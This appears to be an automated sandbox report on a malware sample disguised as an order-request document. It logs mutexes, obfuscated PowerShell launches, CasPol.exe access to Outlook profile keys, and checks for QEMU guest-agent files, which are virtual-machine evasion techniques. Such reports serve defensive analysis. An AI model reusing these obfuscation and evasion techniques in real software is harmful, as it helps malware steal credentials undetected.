            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1376:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1120:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4348:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1552:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1576:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5256:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1580:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5432:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1336:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5912:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1248:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1808:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6668:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5328:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2608:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:312:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4624:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4624:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3000:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7284:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6152:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5348:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5432:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1764:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1376:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2920:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4760:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3876:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6812:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6812:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5772:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7220:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1956:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3876:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3000:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6152:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6752:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7020:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2716:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5956:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1708:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4608:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4312:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3312:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:312:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7036:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1336:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5256:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4192:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3188:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3312:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:304:WilStaging_02
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: Process Memory Space: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe PID: 408, type: MEMORYSTR
            Source: Yara matchFile source: 00000097.00000000.63070891541.0000000000F00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_10002DE0 push eax; ret 1_2_10002E0E
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FAB7F8 pushfd ; ret 1_2_02FAB7AA
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_02FA98F0 push edi; retf 1_2_02FA98F6
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeCode function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_10001B18
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeFile created: C:\Users\user\AppData\Local\Temp\nspD224.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeFile created: C:\Users\user\AppData\Local\Temp\nspD224.tmp\nsExec.dllJump to dropped file
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x6B6570CB -bxor 677
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656C3197 -bxor 677
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x3A3A41D7 -bxor 677
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x656176C0 -bxor 677
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x46696EC0 -bxor 677
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x41286F85 -bxor 677
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x72342289 -bxor 677
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x20692295 -bxor 677
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x78383295 -bxor 677
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe 0x30303295 -bxor 677
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63198062072.0000000000988000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEE
            Source: Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe, 00000001.00000002.63198298116.00000000009B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEXE&
